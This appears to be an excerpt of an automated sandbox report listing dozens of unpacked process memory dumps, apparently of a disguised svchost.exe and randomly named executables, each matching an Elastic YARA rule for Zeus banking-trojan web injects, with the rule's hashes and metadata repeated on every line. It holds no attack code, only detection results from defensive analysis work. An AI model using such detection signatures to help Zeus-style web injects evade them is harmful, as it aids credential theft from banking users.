Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.14b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.43c0000.51.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.69.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.69.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.57.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.76.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ab0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.72.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.56.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.622000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.73.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.64.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.74.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e040000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.53.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.55.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.80.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2702000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2c72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.66.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
